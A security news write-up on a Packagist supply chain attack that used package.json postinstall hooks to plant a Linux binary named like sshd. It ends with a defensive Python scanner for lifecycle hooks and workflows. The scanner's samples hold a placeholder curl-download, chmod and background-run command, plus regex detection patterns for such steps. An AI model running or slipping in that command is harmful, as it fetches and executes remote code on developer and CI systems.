
Packagist Supply Chain Attack Deploys Linux Malware via GitHub

A sophisticated supply chain attack has compromised eight packages on Packagist, injecting malicious code designed to download and execute Linux malware. The attack cleverly targeted projects that bundle JavaScript build tooling with PHP code, exploiting lifecycle hooks that might be overlooked by security teams focused on PHP dependencies.

Key Takeaways

  • Eight Packagist packages were infected with Linux malware.

  • The malware was delivered via a post-installation script defined in package.json.

  • A Linux binary was downloaded from a GitHub Releases URL and disguised as a system process.

  • The attack affected both PHP and Node.js ecosystems, and even GitHub Actions workflows.

The Cross-Ecosystem Attack Vector

The attackers inserted the malicious code not into the PHP side of the package, but into package.json. This strategy targeted projects that include JavaScript build tools alongside PHP code. By placing the malicious script in package.json, the attackers aimed to bypass security scans that primarily focus on PHP dependencies, leaving lifecycle hooks within JavaScript tooling unchecked.

Malware Deployment and Evasion Tactics

Once an affected package was installed, a post-installation script would execute. This script was designed to download a Linux binary from a GitHub Releases URL. The downloaded malware was saved to disk under a filename mimicking a legitimate SSH daemon. Permissions were modified to make the binary executable, and it was run in the background. To further evade detection, the script suppressed error messages and disabled TLS verification during the download, making it difficult for developers to spot any suspicious activity.

The affected packages and their versions include:

  • moritz-sauer-13/silverstripe-cms-theme (dev-master)

  • crosiersource/crosierlib-base (dev-master)

  • devdojo/wave (dev-main)

  • devdojo/genesis (dev-main)

  • katanaui/katana (dev-main)

  • elitedevsquad/sidecar-laravel (3.x-dev)

  • r2luna/brain (dev-main)

  • baskarcm/tzi-chat-ui (dev-main)

Broader Campaign and Detection

Analysis revealed that the same payload was referenced in hundreds of files across GitHub, suggesting a wider campaign. The malicious code was also found embedded in GitHub workflow files, indicating an attempt to compromise CI/CD pipelines in addition to local developer environments. Researchers at Socket.dev identified the campaign through their AI-powered scanner, which flagged suspicious binary download and background execution behaviors. While the affected packages have been removed from Packagist, the nature of branch-tracking versions means developers should also verify the integrity of upstream repositories.
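The behaviours described in the deployment section above (a binary fetched from a GitHub Releases URL with TLS verification disabled, saved under an SSH-daemon-like name, made executable, run in the background, errors silenced) and the workflow-file variant mentioned in this section can be turned into a simple review check. The following scanner is an added example, not code from Socket, from the referenced reports, or from any of the affected projects. It parses a package.json, inspects the npm lifecycle hooks that run automatically on install, and also pulls single-line `run:` steps out of a GitHub Actions workflow; the regexes are heuristics chosen here, and the manifests, workflow and URL in the samples are constructed placeholders, not the real campaign's.

```python
"""Heuristic scanner for install-time lifecycle hooks (added example, not from the article's sources)."""
import json
import re
from typing import Dict, List, Tuple

# npm hooks that run automatically during `npm install`, with no user action.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare", "prepublish")

# Indicator label -> regex. These are heuristics for the behaviours the reports describe,
# not signatures for the actual payload.
INDICATORS = [
    ("download_tool", re.compile(r"\b(?:curl|wget)\b")),
    # curl -k / --insecure (also when combined, e.g. -sk) and wget --no-check-certificate
    ("tls_verification_disabled",
     re.compile(r"(?<=\s)-[A-Za-z]*k\b|--insecure\b|--no-check-certificate\b")),
    ("github_releases_url",
     re.compile(r"https?://github\.com/[^\s'\"]+/releases/download/")),
    ("chmod_executable", re.compile(r"\bchmod\s+(?:\+x|[0-7]{3,4})\b")),
    ("error_output_suppressed", re.compile(r"2>\s*/dev/null|&>\s*/dev/null")),
    # a lone '&' (not '&&', not the '&' in '2>&1') puts the command in the background
    ("background_execution", re.compile(r"\bnohup\b|(?<![&>])&(?!&)(?:\s|$)")),
    ("ssh_lookalike_name", re.compile(r"\bsshd?\b")),
]

# Any of these together with a download tool is treated as high risk.
HIGH_RISK = {"tls_verification_disabled", "chmod_executable", "background_execution"}


def scan_command(command: str) -> List[str]:
    """Return the indicator labels that match one shell command string."""
    return [label for label, pattern in INDICATORS if pattern.search(command)]


def scan_package_json(text: str) -> Dict[str, List[str]]:
    """Parse package.json text and scan every lifecycle hook it defines."""
    manifest = json.loads(text)
    scripts = manifest.get("scripts", {})
    findings: Dict[str, List[str]] = {}
    for hook in LIFECYCLE_HOOKS:
        command = scripts.get(hook)
        if isinstance(command, str):
            hits = scan_command(command)
            if hits:
                findings[hook] = hits
    return findings


def scan_workflow(yaml_text: str) -> List[Tuple[str, List[str]]]:
    """Scan single-line `run:` steps of a GitHub Actions workflow.

    Line-based on purpose so it needs no YAML library; block-style `run: |` steps
    are not covered by this example.
    """
    results = []
    for command in re.findall(r"^\s*-?\s*run:\s*(.+)$", yaml_text, re.M):
        hits = scan_command(command.strip())
        if hits:
            results.append((command.strip(), hits))
    return results


def risk_level(findings: Dict[str, List[str]]) -> str:
    """Collapse per-hook findings into 'high', 'review' or 'clean'."""
    labels = {label for hits in findings.values() for label in hits}
    if "download_tool" in labels and labels & HIGH_RISK:
        return "high"
    return "review" if labels else "clean"


# Constructed samples modelled on the reported behaviour; EXAMPLE-ORG/EXAMPLE-REPO
# and /tmp/sshd are placeholders, not the real campaign's URL or path.
_PLACEHOLDER_CMD = (
    "curl -sk https://github.com/EXAMPLE-ORG/EXAMPLE-REPO/releases/download/v1/sshd "
    "-o /tmp/sshd 2>/dev/null && chmod +x /tmp/sshd && /tmp/sshd 2>/dev/null &"
)
SUSPICIOUS_MANIFEST = json.dumps({
    "name": "example-theme-build",
    "scripts": {"build": "vite build", "postinstall": _PLACEHOLDER_CMD},
})
BENIGN_MANIFEST = json.dumps({
    "name": "example-app",
    "scripts": {"build": "vite build", "postinstall": "node scripts/copy-assets.js"},
})
SAMPLE_WORKFLOW = f"""
name: build
on: [push]
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - run: npm ci
      - run: {_PLACEHOLDER_CMD}
"""

if __name__ == "__main__":
    for name, text in (("suspicious", SUSPICIOUS_MANIFEST), ("benign", BENIGN_MANIFEST)):
        found = scan_package_json(text)
        print(f"{name}: {risk_level(found)} {found}")
    for command, hits in scan_workflow(SAMPLE_WORKFLOW):
        print(f"workflow step flagged: {hits} <- {command[:60]}...")
```

Run it against the package.json of each dependency (including the build tooling shipped inside PHP packages) and against the `.github/workflows` directory of the upstream repository; a `high` result on a hook that should only compile assets is the signal the reports describe. The check is deliberately noisy: a legitimate postinstall that downloads a prebuilt binary will also be flagged, and that is the point, since such hooks deserve a human look before installation.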

Sources

  • Packagist Supply Chain Attack Infects 8 Packages Using GitHub-Hosted Linux Malware, The Hacker News.

  • Hackers Hide Linux Payload Under SSH-Like Filename During Package Installation, CyberSecurityNews.
